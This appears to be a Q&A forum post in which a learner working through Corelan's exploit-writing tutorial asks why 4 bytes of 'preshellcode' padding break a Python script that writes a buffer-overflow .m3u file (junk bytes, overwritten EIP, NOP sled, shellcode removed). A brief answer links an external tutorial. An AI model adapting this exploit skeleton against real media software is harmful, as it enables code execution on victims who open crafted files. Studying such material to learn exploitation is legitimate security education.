# Understanding Preshellcode in Corelans Exploit Writing Tutorial

Tags: python, exploit

I am learning from Corelans exploit writing tutorial, however there's something in this which I don't understand, I have removed the shellcode from the script to save space (that is not the problem) and converted it to python

```
#!/usr/bin/python

junk = 'A' * 26109

eip = '\x2A\xB2\xD8\x01'
preshellcode = 'XXXX' ###
shellcode = "\x90" * 25

shellcode += 'shellcode went here'

f = open('crash.m3u', 'w')
f.write(junk+eip+preshellcode+shellcode) ###
f.close
```

If you remove a variable called 'preshellcode' editing the lines ending '###' this script works, but the problem is I have to remove the preshellcode, which contain 4 bytes ('XXXX') and perfectly aligns the shellcode in ESP. `shellcode = "\x90" * 25` was added instead, followed by the real shellcode. now that confused me. I even tried changing that '\x90' to 4 ect. any explanation what's happening here?

Answer (score 1):

Preshellcode is the padding you are using it incorrectly, you can check it online to know where it should be added.
this example might help you.
http://securityxploded.com/remote-buffer-overflow-exploits.php